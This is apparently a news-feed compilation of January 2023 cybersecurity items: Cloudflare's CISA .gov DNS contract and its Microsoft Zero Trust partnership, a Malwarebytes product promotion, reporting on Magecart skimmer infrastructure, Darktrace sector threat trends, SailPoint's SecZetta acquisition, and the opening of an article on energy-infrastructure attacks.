With the $7.2M contract, Cloudflare will enhance resilience and simplify security for .gov domain users.

**San Francisco, CA, January 13, 2023** **–** Cloudflare, Inc. (NYSE: NET), the security, performance, and reliability company helping to build a better Internet, has been awarded a $7.2 million contract from the Cybersecurity and Infrastructure Security Agency (CISA) to provide Registry and Authoritative DNS services to the .gov TLD (Top Level Domain).

"The Internet has made the United States government more accessible for constituents than ever before, whether they're applying for a passport, learning health and safety recommendations for their communities, or reaching out to a representative," said Matthew Prince, co-founder & CEO of Cloudflare. "Having a reliable and secure DNS for government agencies is critical to instill trust in all .gov activity, and working with us to achieve this is a testament to the reliability and security of the Cloudflare network."

CISA is the nation’s risk advisor, working with partners to defend against today’s threats and collaborating to build more secure and resilient infrastructure for the future. CISA builds the nation’s capacity to defend against cyber attacks by providing cybersecurity tools, incident response capabilities, and assessment services to safeguard the Federal IT enterprise, state and local partners, and systems that support national critical functions.

DNS is a core Internet service that is foundational to the security of the applications that sit on top of it. CISA turned to Cloudflare to provide registry and DNS services to meet the need for highly available DNS services that enhance resilience and simplify security operations for .gov domain users. CISA makes .gov domains available at no cost to US-based government organizations, but it takes more than registering a domain to put it on the Internet. DNS services guide visitors to the site. The .gov TLD registry and DNS services are available to all bona fide U.S.-based government organizations.

With this contract, Cloudflare will provide managed name servers for the .gov zone and authoritative DNS hosting for .gov domain names. Cloudflare will support CISA’s goals:

*   Reducing the attack surface of .gov-related infrastructure and government organizations
*   Automating sensitive portions of DNS security management, setting DNS records that make it hard to successfully impersonate the government in email by default, and offering new features
*   Gaining visibility to better detect and prevent certain DNS ecosystem issues instead of reacting to them

Cloudflare recently achieved FedRAMP moderate authorization and is available on the FedRAMP marketplace. Cloudflare provides security, performance, and reliability services through its global network to over 40 United States Federal Government agencies. In 2021, CISA began utilizing Cloudflare to deliver a protective DNS resolver solution for all Federal Civilian Executive Branch (FCEB) agencies. Cloudflare is committed to supporting critical government functions, including the nation's election infrastructure. Through its Athenian Project, Cloudflare provides services for free to state, county, and local officials administering elections.

For more information, visit:

*   Cloudflare for Public Sector

**About Cloudflare** Cloudflare, Inc. (www.cloudflare.com / @cloudflare) is on a mission to help build a better Internet. Cloudflare’s suite of products protect and accelerate any Internet application online without adding hardware, installing software, or changing a line of code. Internet properties powered by Cloudflare have all web traffic routed through its intelligent global network, which gets smarter with every request. As a result, they see significant improvement in performance and a decrease in spam and other attacks. Cloudflare was awarded by Reuters Events for Global Responsible Business in 2020, named to Fast Company's Most Innovative Companies in 2021, and ranked among Newsweek's Top 100 Most Loved Workplaces in 2022.

**Forward-Looking Statements** This press release contains forward-looking statements within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934, as amended, which statements involve substantial risks and uncertainties. In some cases, you can identify forward-looking statements because they contain words such as “may,” “will,” “should,” “expect,” “explore,” “plan,” “anticipate,” “could,” “intend,” “target,” “project,” “contemplate,” “believe,” “estimate,” “predict,” “potential,” or “continue,” or the negative of these words, or other similar terms or expressions that concern Cloudflare’s expectations, strategy, plans, or intentions. However, not all forward-looking statements contain these identifying words. Forward-looking statements expressed or implied in this press release include, but are not limited to, statements regarding the capabilities and effectiveness of Cloudflare’s Registry and Authoritative DNS solutions and its other products and technology, the benefits to the U.S. government and Cloudflare’s other customers from using Cloudflare’s Registry and Authoritative DNS solutions and its other products and technology, the expected functionality and performance of Cloudflare’s Registry and Authoritative DNS solutions and its other products and technology, the benefits to Cloudflare from achieving FedRAMP moderate authorization, Cloudflare’s technological development, future operations, growth, initiatives, or strategies, and comments made by Cloudflare’s CEO and others. Cloudflare’s actual results could differ materially from those stated or implied in forward-looking statements due to a number of factors, including but not limited to, risks detailed in its filings with the Securities and Exchange Commission (SEC), including Cloudflare’s Quarterly Report on Form 10-Q filed on November 3, 2022, as well as other filings that we may make from time to time with the SEC.

The forward-looking statements made in this press release relate only to events as of the date on which the statements are made. We undertake no obligation to update any forward-looking statements made in this press release to reflect events or circumstances after the date of this press release or to reflect new information or the occurrence of unanticipated events, except as required by law. We may not actually achieve the plans, intentions, or expectations disclosed in Cloudflare’s forward-looking statements, and you should not place undue reliance on Cloudflare’s forward-looking statements.

Cloudflare Wins CISA Contract for Registry and Authoritative Domain Name System (DNS) Services

Categories: Personal
The Internet is kind of like the Wild West when it comes to threats to our privacy and security. But Malwarebytes can help you become the sheriff of your own digital frontier.



(Read more...)




The post 3 ways Malwarebytes helps you browse securely and privately online appeared first on Malwarebytes Labs.

Malicious links. Third-party ad trackers. Information-gobbling data brokers.

Let’s face it, the Internet is kind of like the Wild West when it comes to threats to our privacy and security. And unfortunately, it takes a little more than a cowboy hat and a pistol to defend yourself out there.

That’s where Malwarebytes Premium + Privacy VPN comes in.

Whether it's blocking unwanted trackers, securing your personal information, or booting malware off your devices, here are three ways Malwarebytes can help you become the sheriff of your own digital frontier.

**1\. Let’s you browse anonymously**

It’s no secret that some companies are big fans of your personal information.

Your name, your address, location data, and more, are all being collected, packaged up, and sold to advertisers at any given moment. Even menstrual cycle data is fair game.

But one of the most valuable pieces of information is your browsing history, because it says a lot about what you like and where you spend your time. When it comes to getting a good look at your browsing your ISP has a window seat, and in the USA ISPs have been allowed to sell your browsing data since 2017.

The easiest and most effective ways to put a stop to that? Using a Virtual Private Network, or VPN.

VPNs create a secure, encrypted "tunnel" between your device and the VPN server, through which all of your internet traffic is routed—so if your ISP is collecting your data, it won’t be able to read it.

But not all VPNs are equal.

Some VPN providers log your data and browsing history, which means they're just another ISP that can potentially share your data with third parties. Other VPNs can slow down your Internet to a significant degree, using older encryption methods or having fewer options for servers located nearer to you.

Needless to say, choosing the wrong VPN vendor can feel like trading one poison for another. So if you're tired of dealing with both data-hungry companies and lackluster VPNs, then look no further than Malwarebytes Privacy.

*   We don’t log anything. **Ever**.
*   **Best-in-class encryption** secures your personal information.
*   **Less lag**. Browse the Internet faster with VPNs powered by WireGuard®.
*   Over 380 servers **in more than 30 countries**.
*   7-day free trial. All the premium features, no data limits!

**2\. Crushes ads, third-party trackers, and blocks malicious websites**

We ignore the many threats to web browsers at our own peril.

Legitimate sites are following us with third-party tracking code, and criminal hackers are busy making friendly sites unfriendly by injecting credit card skimmers, and trying to steal our passwords with phishing sites. One way or another, wherever you go, your personal, sensitive data is being stolen or shared with somebody using it for financial gain.

And your browser? It lets this happen without complaint.

If you think your browser comes with native abilities to block tracking scripts and other threats like phishing websites, though, you’d be half right.

Chrome has the infamously useless 'Do Not Track' setting, and anti-phishing engines exist, like Chrome Safe Browsing or Microsoft Defender SmartScreen, but they work with variable levels of success and aren't enough by themselves.

It stands to reason then that Malwarebytes Browser Guard is the ultimate browsing sidekick for quashing ads, phishing sites, and trackers.

*   **You're in charge**. We prevent third-party ad trackers from collecting information about your browsing habits.
*   **Shields up**. We intercept (and block) malicious skimming scripts your browser can execute them.
*   **Clear the clutter**. Browse up to 4x faster by blocking ads and other unwanted content.
*   Uses heuristics to **sniff out and block** unknown phishing sites.
*   Available on your preferred browser—for free!

Malwarebytes Browser Guard blocking a credit card skimming attack

**3\. Uses multiple protection layers to actively stop threats**

A key part of browsing securely online is accepting the risk that no one technology can keep out 100 percent of the threats 100 percent of the time.

To that end, it’s essential to use a strong anti-malware product that catches any threats that _do_ slip through the cracks and make it to your desktop.

But that's not all. To quote everybody's favorite ogre, security has “layers” just like onions—**your anti-malware should also have multi-layers of defense, not just one**.

Because what’s better than one layer of protection? Two.

What’s better than two? Three.

Better than that?

(Okay, you get the point.)

The fact is you don’t want to rely on any one mechanism to keep the wolves at bay, you want several.

Enter Malwarebytes Premium, offering four different layers of malware protection.

*   **Advanced web protection.** Blocks outgoing or incoming communication so malware can't receive instructions or steal your data.
*   **Malware & PUP protection**. Blocks malware, viruses, adware, potentially unwanted programs (PUPs), and other threats.
*   **Ransomware protection.** Proprietary ransomware attack prevention technology.
*   **Exploit protection.** Blocks malware which seeks to leverage bugs and vulnerabilities in your device.

**Go beyond just antivirus. Level-up your security and privacy today.**

Choosing between security and privacy shouldn’t feel like a Herculean task.

While no single method is ever 100 percent foolproof, there are some tried and true ways for keeping your data (and device) safe that, if put into practice, will guard you from most of the threats and prying eyes on the Internet.

Downloading Malwarebytes is one of those ways.

With the Malwarebytes Premium + Privacy VPN bundle, you get total protection with smart antivirus, faster, safer web browsing, and our next-gen VPN for your online privacy. Level-up your protection and upgrade to the bundle today.

Stay safe out there!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Title: 3 ways Malwarebytes helps you browse securely and privately online

Malicious links. Third-party ad trackers. Information-gobbling data brokers. 

Let’s face it, the Internet is kind of like the Wild West when it comes to threats to our privacy and security. And unfortunately, it takes a little more than a cowboy hat and a pistol to defend yourself out there. 

That’s where Malwarebytes Premium + Privacy VPN comes in.

Whether it's blocking unwanted trackers, securing your personal information, or booting malware off your devices, here are three ways Malwarebytes can help you become the sheriff of your own digital frontier.

1.  **Let’s you browse anonymously**

It’s no secret that companies are big fans of your personal information. 

Whether it’s your name, your address, browsing history, location data, and so on—it’s all being collected, packaged up, and sold to advertisers at any given moment. Even menstrual cycle data is fair game.

One of the easiest and most effective ways to put a stop to all this snooping? Using a Virtual Private Network, or VPN. 

VPNs create a secure, encrypted "tunnel" between your device and the VPN server, through which all of your internet traffic is routed—so even if companies are collecting your data, they won’t be able to read it. That means no more  location tracking and targeted ads.

But not all VPNs are equal. 

Some VPN providers may log your data and browsing history, which means they could potentially share your data with third parties. Others can slow down your Internet to a significant degree, using older encryption methods or having fewer options for servers located nearer to you.

Needless to say, choosing the wrong VPN vendor can feel like trading one poison for another. So if you're tired of dealing with both data-hungry companies and lackluster VPNs, then look no further than Malwarebytes Privacy. 

*   We don’t log anything. Ever. 
    
*   Best-in-class encryption secures your personal information.
    
*   Less lag. Browse the Internet faster with VPNs powered by WireGuard®.
    
*   Over 380 servers in more than 30 countries.
    
*   7-day free trial. All the premium features, no data limits!
    

2.  Crushes ads, third-party trackers, and blocks malicious websites
    

We ignore the many threats native to browsers at our own peril. 

Peel back the pretty UI, and you’ll find a delicate machinery of code that threat actors and third-parties can manipulate using browser scripts.

Think of it like putting a Trojan horse into the gears of a website. Anyone can sneak an ad tracker or credit card skimmer into the browser’s back-end, right under your nose. The result is the same either way—personal, sensitive data is stolen and used for financial gain. 

If you think your browser comes with native abilities to block tracking scripts and other threats like phishing websites, though, you’d be half right. 

Chrome has the infamously useless 'Do Not Track' setting—but that’s about it. Anti-phishing engines exist, like Chrome Safe Browsing or Microsoft Defender SmartScreen—but with variable levels of success. 

It stands to reason then that Malwarebytes Browser Guard is the ultimate browsing sidekick for quashing ads, phishing sites, and trackers.

*   You're in charge. We prevent third-party ad trackers from collecting information about your browsing habits.
    
*   Shields up. We intercept (and block) malicious skimming scripts your browser can execute them.
    
*   Clear the clutter. Browse up to 4x faster by blocking ads and other unwanted content.
    
*   Uses heuristics to sniff out and block unknown phishing sites.
    
*   Available on your preferred browser—for free!
    

Malwarebytes Browser Guard blocking a credit card skimming attack

3.  Uses multiple protection layers to actively stop threats
    

A key part of browsing securely online is accepting the risk that no browser or browser extension can keep out 100% of the threats 100% of the time. 

To that end, it’s essential to use a strong anti-malware product that catches the threats that do slip through the cracks and make it to your desktop.

But that's not al. To quote everybody's favorite ogre, security has “layers” just like onions—your anti-malware should also have multi-layers of defense, not just one.

Because what’s better than one layer of protection? Two. 

What’s better than two? Three. 

Better than that? 

(Okay, you get the point.)

The fact is you don’t want to rely on any one mechanism to keep the wolves at bay, you want several. 

Enter Malwarebytes Premium, offering four different layers of malware protection.

*   Advanced web protection. Blocks outgoing or incoming communication between your computer and a malicious Internet Protocol (IP) address.
    
*   Halt hackers. Blocks malware, viruses, adware, potentially unwanted programs (PUPs), and other threats.
    
*   Intelligent defense. Proprietary ransomware attack prevention technology.
    
*   Exploit. Blocks malware which seeks to leverage bugs and vulnerabilities in your device.
    

**Go beyond just antivirus. Level-up your security and privacy today.**

Choosing between security and privacy shouldn’t feel like a Herculean task.

3 ways Malwarebytes helps you browse securely and privately online

A security vendor's investigation of infrastructure associated with a new, crypto-focused Magecart skimmer leads to discovery of cryptoscam sites, malware distribution marketplace, Bitcoin mixers, and more.

Cybercriminals engaged in one form of criminal activity can sometimes have their hands in a wide range of other nefarious campaigns as well, as researchers recently discovered when analyzing the infrastructure associated with a fresh iteration of a Magecart skimmer.

Magecart is a notorious — and constantly evolving — syndicate of multiple groups that specializes in placing card skimmers on e-commerce sites to steal payment card information. Over the years, groups belonging to the syndicate have executed numerous — sometimes massive — heists of card information from websites, including those belonging to major companies like TicketMaster and British Airways.

Researchers from Malwarebytes recently observed a threat actor deploying a payment card skimmer — based on a framework called mr.SNIFFA — on multiple e-commerce sites. mr.SNIFFA is a service that generates Magecart scripts that threat actors can dynamically deploy to steal credit and debit card information from users paying for purchases on e-commerce websites. The malware is known for employing various obfuscation methods and tactics like steganography to load its payment card stealing code onto unsuspecting target websites.

**Sprawling Crime Haven**

Their investigation of the infrastructure used in the campaign led to the discovery of a sprawling network of other malicious activities — including cryptocurrency scams, forums for selling malicious services, and stolen credit card numbers — that appeared linked to the same actor. 

"Where one criminal service ends, another one begins — but often times they are linked," said Jerome Segura, director of threat intelligence at Malwarebytes, in a blog post summarizing the company's research. "Looking beyond snippets of code and seeing the bigger picture helps to better understand the larger ecosystem as well as to see potential trends."

In the Magecart campaign that Malwarebytes observed, the threat actor used three different domains for deploying different components of the attack chain. Each of the domains had crypto-inspired names. The domain that injected the initial redirect component of the infection chain for instance had the name "saylor2xbtc\[.\]com," apparently in a nod to noted Bitcoin proponent Michael Saylor. Other celebrities were referenced too: A domain named "elon2xmusk\[.\]com" hosted the loader for the skimmer, while "2xdepp\[.\]com" contained the actual encoded skimmer itself.

Malwarebytes found the three domains hosted on infrastructure belonging to DDoS-Guard, a Russia-based bulletproof hosting company with a reputation for hosting shady websites and operations. The security vendor's investigation showed each of the three domains were associated with a wide range of other malicious activities.

The IP address, which hosted the skimmer loader for instance, also hosted a fraudulent version of home décor and decoration company Houzz's website. Similarly, the IP address for 2xdepp\[.\]com — the site hosting the skimmer — hosted a website selling tools like RDP, Cpanel, and Shells, and another website that offered a service for mixing cryptocurrencies —something that cybercriminals often use to making illicitly earned money harder to trace. 

Researchers at Malwarebytes further discovered blackbiz\[.\]top, a forum that cybercriminals use to advertise various malware services, hosted on the same subnet.

**Crypto-Related Scams**

Malwarebytes decided to see if there were any other websites hosted on DDoS Guard that might have the same "2x" in their domain names as the three sites associated with the Magecart campaign had. The exercise revealed multiple fraudulent websites engaged in illicit cryptocurrency related activities. 

"These fake sites claim to be official events from Tesla, Elon Musk, MicroStrategy, or Michael J. Saylor and are tricking people with false hopes of earning thousands of BTC," Segura said. "These crypto-giveaway scams have grown five-fold in H1 2022, according to a September 2022 report by Group-IB," he added.

Malwarebytes also discovered multiple other sites on DDoS Guard that appeared linked to the Magecart operator. Among them were phishing sites spoofing TeamViewer, AnyDesk, MSI, a Web portal named after journalist Brian Krebs for selling stolen credit card data, and one site selling a range of phishing kits.

Malwarebytes' research highlights the still sprawling nature of some cybercrime groups, even as others have begun to specialize in specific cybercriminal activities with a view to collaborating with others on joint malicious campaigns. 

Over the past few years, threat actors such as Evil Corp, North Korea's Lazarus Group, DarkSide, and others have earned reputations for being both big and varied in their operations. More recently though, others have begun to focus more narrowly on their specific skills.

Research that security vendor Trend Micro conducted last year showed that increasingly, cybercriminals with different skills are conglomerating to offer cybercrime-as-a-service. The company discovered these criminal services to be comprised of groups offering either access-as-a-service, ransomware-as-a-service, bulletproof hosting, or crowdsourcing teams focused on finding new attack methods and tactics.

"From an incident-response mentality, this means \[defenders\] will have to identify these different groups completing specific aspects of the overall attack, making it tougher to detect and stop attacks," Trend Micro concluded.

Researchers Find 'Digital Crime Haven' While Investigating Magecart Activity

**CAMBRIDGE, England****,** **Jan. 12, 2023** **/PRNewswire/ --** Darktrace, a global leader in cyber security artificial intelligence, today released three new cyber-threat trend reports revealing 2022 attack data observed across its global customer fleet.1 The industry reports pertain to the energy, healthcare, and retail sectors respectively.

"These industry-specific reports are the first of their kind released by Darktrace, representing an important effort to surface the data underpinning the rapidly evolving threat landscape that we are defending against," commented Toby Lewis, Global Head of Threat Analysis, Darktrace.

"The trends reveal crucial sector-specific challenges, from the tendency for hackers to siphon off the energy sector's resources in the form of crypto\-jacking, through to the invaluable nature of patient data which leads to data exfiltration in the healthcare sector," commented Lewis. "The surge in credential-based attacks across the retail sector reflects the fact that identity theft will be a key trend for 2023, increasing the need for AI-based behavioral analytics for understanding employee actions in rich context and authenticating the actions taken using certain credentials."

**Energy Sector: Key Findings**

Against the backdrop of a global energy crisis, Darktrace's energy sector report reveals that illegal crypto\-mining threats,whereby bad actors steal energy and processing power from other devices and networks, are on the rise across the industry. Notable findings include:

*   High-priority crypto\-mining accounted for 13 times more of all observed cyber incidents in the UK energy sector in 2022 compared to 2021
*   High-priority crypto\-mining accounted for 3 times more of all observed cyber incidents in the US energy sector in 2022 compared to 2021

The report divulges two real-world crypto\-mining threat finds from a European and US energy organization respectively, which were both stopped by Darktrace's AI technology. In the former case, attackers were caught attempting to mass pool crypto\-mining capabilities using 5 internal servers at the organization.

**Retail Sector: Key Findings**

As online shopping remains popular, Darktrace's retail sector report reveals that over the course of 2022, criminals increasingly turned toward credential theft, spoofing and stuffing to target this multi-billion-dollar industry's online infrastructure. Notably:

*   Credential theft, spoofing and stuffing accounted for over 170% more of all observed cyber incidents in the US retail sector in 2022 compared to 2021
*   Credential theft, spoofing and stuffing accounted for over 14% more of all observed cyber incidents in the UK retails ector in 2022 compared to 2021
*   Credential theft, spoofing and stuffing accounted for over 70% more of all observed cyber incidents in the Australian retail sector in 2022 compared to 2021

One threat find in the report from August 2022 details the discovery of a never-before-seen attack tool lying dormant inside a well-known UK automotive retailer. Months before Darktrace had been adopted by the retailer, one of its devices had become infected with novel malware that lay dormant, establishing a foothold and waiting for the right time to launch an attack. After deployment, Darktrace AI caught the malware when it made multiple authentication attempts using spoofed credentials for one of the organization's security managers. If successful, the attack could have undermined the organization's entire security posture, allowing malicious software to gain control of the company's infrastructure from within.

**Healthcare Sector: Key Findings**

Often viewed as a 'soft target' for cyber-criminals, hospitals and other healthcare organizations are extremely rich data sources from which attackers can make a profit by selling patient information such as medical records, credit cards or banking details. Darktrace's healthcare sector report notably revealed:

*   Data exfiltration was one of the top 3 observed threats faced by healthcare providers globally, with organizations in the UK and Australia suffering an increased volume in 2022
*   The most common attack type observed across healthcare globally in 2022 was suspicious network scanning, a form of intelligence gathering which often constitutes the initial phase of a cyber-attack

The report details a real-world sophisticated threat faced by a US healthcare provider in which a malicious PowerShell script was discovered to be deployed on one of the organization's internal servers, an attempt to give bad actors remote control over the target network. The threat was autonomously thwarted by Darktrace's RESPOND™ technology before attackers could do harm.

**About Darktrace**

Darktrace (DARK.L), a global leader in cyber security artificial intelligence, delivers complete AI-powered solutions in its mission to free the world of cyber disruption. Breakthrough innovations from the Darktrace Cyber AI Research Centre in Cambridge, UK and its R&D centre in The Hague, The Netherlands have resulted in over 125 patent applications filed and significant research published to contribute to the cyber security community. Darktrace's technology continuously learns and updates its knowledge of 'you' for an organization and applies that understanding to achieve an optimal state of cyber security. It is delivering the first ever Cyber AI Loop, fuelling a continuous end-to-end security capability that can autonomously prevent, detect, and respond to novel, in-progress threats in real time. Darktrace employs over 2,200 people around the world and protects over 8,100 organizations globally from advanced cyber-threats. It was named one of TIME magazine's 'Most Influential Companies' in 2021.

The data pertains to the period January-October 2022 and is compared with the same period in 2021.

Darktrace Publishes 2022 Cyberattack Trend Data For Energy, Healthcare & Retail Sectors Globally

**SAN FRANCISCO -- (****BUSINESS WIRE****) --** Cloudflare, Inc. (NYSE: NET), the security, performance, and reliability company helping to build a better Internet, today announced an expansion of its relationship with Microsoft to help customers easily deploy, automate, and enhance their organization’s Zero Trust security.

Working from anywhere is more common than ever, and critical applications have moved to the cloud—no longer residing inside an office protected by a secure perimeter. This fundamental shift in where and how people work has caused enterprises to rethink legacy tools and abandon the traditional castle-and-moat approach to security, looking towards Zero Trust instead. As CIOs continue to navigate this paradigm shift, Cloudflare has developed a new set of integrations with Microsoft to help organizations on this journey. Now, mutual customers can seamlessly deploy Zero Trust security tools in minutes, with no complex code changes, and add industry-first features, such as Cloudflare’s Remote Browser Isolation technology.

"When I speak with CIOs, I continue to hear that their number one concern remains security, closely followed by adapting to the new hybrid world,” said Matthew Prince, CEO and co-founder at Cloudflare. “We want to make it easier than ever for IT leaders to deploy Zero Trust security across the enterprise and keep users safe wherever they are working from. I’m thrilled that we are deepening our integration with Microsoft so we can help our joint customers easily deploy Zero Trust security across some of the most used applications in the workplace.”

Through these new integrations, Cloudflare now provides a comprehensive identity driven approach to protect applications, users, devices and networks from attacks. These integrations pair Microsoft Identity solutions and Cloudflare network security tools to create a quality Zero Trust offering.

“A cloud-native Zero Trust security model has become an absolute necessity as enterprises continue to adopt a cloud-first strategy,” said Joy Chik, President, Identity and Network Access, Microsoft. “Cloudflare has developed robust product integrations with Microsoft to help security and IT leaders prevent attacks proactively, dynamically control policy and risk, and increase automation in alignment with Zero Trust best practices.”

Cloudflare and Microsoft Azure Active Directory (Azure AD) customers can now:

*   **Deploy Zero Trust Security without changing one line of code:** Now joint customers can choose to define specific rules in either Azure AD or in Cloudflare Access i.e. which users can access specific applications based on various factors such as user risk level, device platform, location, etc. and enforce across both products without changing a line of code.
*   **Isolate high-risk users automatically with industry leading browser isolation technology:** By integrating Cloudflare’s Remote Browser Isolation with Azure AD, high-risk users, such as temporary employees, are contained proactively in a remote browser session for added security.
*   **Save IT teams hundreds of hours of manual work:** Cloudflare Access will use the System for Cross-Domain Identity Management (SCIM) to directly integrate with Azure AD. Groups are automatically synced across Cloudflare and Azure Active Directory platforms and groups, saving hundreds of hours of manual work from IT teams.
*   **Keep sensitive Government data off of the public Internet:** By connecting Azure Government Cloud to Cloudflare’s global network via the Secure Hybrid Access (SHA) program, Government customers (‘GCC’) will be able to keep sensitive traffic secure by staying off of the public Internet. Additionally, Government customers (‘GCC’) will be able to define and enforce granular rules defining who can access what using the joint solution from the dashboard without any code changes.

Cloudflare has worked with Microsoft since 2018 to provide mutual customers with an improved Internet experience by securing web applications and safeguarding employees with identity and device protections. Cloudflare’s deep integrations across Microsoft 365 and Azure have supported many of the largest Fortune 500 companies on their Zero Trust journey, enabling customers to simply and easily support their security and performance needs. Most recently, Microsoft named Cloudflare the winner of its Security Software Innovator of the Year award.

To learn more about Cloudflare’s integration with Microsoft, check out the resources below:

*   Blog: Expanding our collaboration with Microsoft: proactive and automated Zero Trust security for customers
*   Joint reference architecture
*   Joint Zero Trust Webinar
*   Microsoft landing page
*   Docs: Enable SCIM on the Zero Trust dashboard
*   Docs: Use multiple Azure AD Conditional Access Policies with Access
*   Docs: Isolate Azure AD risky users

**About Cloudflare**

Cloudflare, Inc. (www.cloudflare.com / @cloudflare) is on a mission to help build a better Internet. Cloudflare’s suite of products protect and accelerate any Internet application online without adding hardware, installing software, or changing a line of code. Internet properties powered by Cloudflare have all web traffic routed through its intelligent global network, which gets smarter with every request. As a result, they see significant improvement in performance and a decrease in spam and other attacks. Cloudflare was awarded by Reuters Events for Global Responsible Business in 2020, named to Fast Company's Most Innovative Companies in 2021, and ranked among Newsweek's Top 100 Most Loved Workplaces in 2022.

**Forward-Looking Statements**

This press release contains forward-looking statements within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934, as amended, which statements involve substantial risks and uncertainties. In some cases, you can identify forward-looking statements because they contain words such as “may,” “will,” “should,” “expect,” “explore,” “plan,” “anticipate,” “could,” “intend,” “target,” “project,” “contemplate,” “believe,” “estimate,” “predict,” “potential,” or “continue,” or the negative of these words, or other similar terms or expressions that concern Cloudflare’s expectations, strategy, plans, or intentions. However, not all forward-looking statements contain these identifying words. Forward-looking statements expressed or implied in this press release include, but are not limited to, statements regarding Cloudflare’s partnership with Microsoft and the potential resulting benefits to Cloudflare customers, the potential benefits to customers of integrating Cloudflare and Microsoft products, the potential opportunity for Cloudflare to attract additional customers and to expand sales to existing customers through Cloudflare’s product integrations with Microsoft, the expected functionality and performance of Cloudflare’s Zero Trust and other products and technology, Cloudflare’s technological development, future operations, growth, initiatives, or strategies, and comments made by Cloudflare’s CEO and others. Actual results could differ materially from those stated or implied in forward-looking statements due to a number of factors, including but not limited to, risks detailed in Cloudflare’s filings with the Securities and Exchange Commission (SEC), including Cloudflare’s Quarterly Report on Form 10-Q filed on November 3, 2022, as well as other filings that Cloudflare may make from time to time with the SEC.

The forward-looking statements made in this press release relate only to events as of the date on which the statements are made. Cloudflare undertakes no obligation to update any forward-looking statements made in this press release to reflect events or circumstances after the date of this press release or to reflect new information or the occurrence of unanticipated events, except as required by law. Cloudflare may not actually achieve the plans, intentions, or expectations disclosed in Cloudflare’s forward-looking statements, and you should not place undue reliance on Cloudflare’s forward-looking statements.

Cloudflare Expands Relationship With Microsoft

This move accelerates the company’s vision of becoming the de facto identity security platform of choice for the modern enterprise.

**AUSTIN, January 12, 2023 –** SailPoint Technologies, Inc., the leader in enterprise identity security, today announced it has acquired SecZetta, the leading provider of third-party identity risk solutions. With nearly half of today’s enterprises comprised of non-employees, organizations need to factor this growing group of identities into their approach to identity security. With SecZetta, SailPoint will help companies gain better visibility into all types of identities, across both employee and non-employee identities – from third-party contractors to temporary workers, and non-human identities – all from a single, market-leading identity security platform. This acquisition will give enterprises the centralized approach needed, plus the proper identity proofing required to fully validate non-employee identities across their businesses. 

"The enterprise identity landscape has changed significantly in the last few years. We went from a largely in-office workforce to a distributed, virtual workforce and now a hybrid workforce. On top of that, most enterprises no longer rely solely on full-time employees to keep their business running. Yet not all of these companies have considered how this change impacts their approach to identity security," said Grady Summers, EVP Product for SailPoint. "With SecZetta, we can quickly give our customers the consolidated intelligence and visibility they need to ensure proper oversight into all identities and their technology access needs, regardless of whether they are a full-time employee or not."

SailPoint and SecZetta have a long-standing partnership. Once SecZetta’s solutions are fully integrated into SailPoint’s Identity Security Cloud platform, SailPoint will deliver a unified platform to customers — providing context-rich identity information with the right level of intelligence needed to answer the "who should have access to what", "when" and "why" questions for this unique, often under-secured set of identities. With SecZetta, SailPoint will also be able to further help companies with identity consolidation efforts, merging and organizing workforce data across authoritative sources to create a centralized repository of identities.  This identity intelligence will then be offered as a packaged offering within the Identity Security Cloud platform to deliver the next generation of identity security — one that provides the critical layer of risk management and governance needed across both employee and non-employee identities from a single platform.

"Acquiring SecZetta allows us to quickly address an emerging threat to our customers’ business — and that is this gap in visibility over non-employee identities. Here at SailPoint, we want to be known as the kind of company our customers can always rely on to anticipate and solve for their needs as they continue to evolve," said Mark McClain, CEO and Founder, SailPoint.  "This announcement underscores our relentless focus on accelerating our vision of becoming the de facto identity security platform of choice that discovers, manages and secures all identities across the modern enterprise." 

**About SailPoint**

SailPoint is the leading provider of identity security for the modern enterprise. Enterprise security starts and ends with identities and their access, yet the ability to manage and secure identities today has moved well beyond human capacity. Using a foundation of artificial intelligence and machine learning, the SailPoint Identity Security Platform delivers the right level of access to the right identities and resources at the right time—matching the scale, velocity, and environmental needs of today’s cloud-oriented enterprise. Our intelligent, autonomous, and integrated solutions put identity security at the core of digital business operations, enabling even the most complex organizations across the globe to build a security foundation capable of defending against today’s most pressing threats.

SailPoint Acquires SecZetta to Provide Identity Security for Non-Employee Identities

Energy has become the new battleground for both physical and cyber security warfare, driven by nation-state actors, increasing financial rewards for ransomware gangs and decentralized devices. Chris Price reports.

The physical threat to the world's critical national infrastructure (CNI) has never been greater. At least 50 meters of the Nord Stream 1 and 2 underground pipelines that once transported Russian gas to Germany were destroyed in an attack in late September 2022, though it remains unclear who is to blame.

More recently, Russia has also shifted its war in Ukraine to targeting energy infrastructure with its own missiles and Iran-supplied Shahed-136 drones. According to a tweet from Ukraine's President Volodymyr Zelensky on Oct. 18, "30% of Ukraine's power stations have been destroyed, causing massive blackouts across the country," while on Nov. 1 during a meeting with the European Commissioner for Energy, Kadri Simson, Zelensky said that between "30% and 40% of \[the country's\] energy systems had been destroyed."

**Growing Cybersecurity Threat**

However, physical security threats resulting from the war in Ukraine and increasing tensions between East and West aren't the only serious threats to our CNI. There is a growing cybersecurity threat too. On May 7, 2021, the Colonial Pipeline that originates in Houston, Texas, and that carries gasoline and jet fuel to the southeastern US was forced to halt all of its operations to contain a ransomware attack.

In this attack, hackers gained entry through a VPN (virtual private network) account that allowed employees to access the company's systems remotely using a single username and password found on the Dark Web. Colonial paid the hackers, who were an affiliate of a Russia-linked cybercrime group Darkside, a $4.4 million ransom shortly after the attack.

Less than a year later, Sandworm, a threat group allegedly operated by the Russian cybermilitary unit of the GRU, attempted to prevent an unnamed Ukrainian power provider from functioning. "The attackers attempted to take down several infrastructure components of their target, namely: Electrical substations, Windows-operated computing systems, Linux-operated server equipment, \[and\] active network equipment," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said in a statement.

Slovak cybersecurity firm ESET, which collaborated with Ukrainian authorities to analyze the attack, said the attempted intrusion involved the use of ICS-capable malware and regular disk wipers, with the adversary unleashing an updated variant of the Industroyer malware.

"The Sandworm attackers made an attempt to deploy the Industroyer2 malware against high-voltage electrical substations in Ukraine," ESET explained. The victim's power grid network was understood to have been penetrated in two waves, the initial compromise coinciding with the Russian invasion of Ukraine in February 2022 and a follow-up infiltration in April allowing the attackers to upload Industroyer2.

**Digitized Environments**

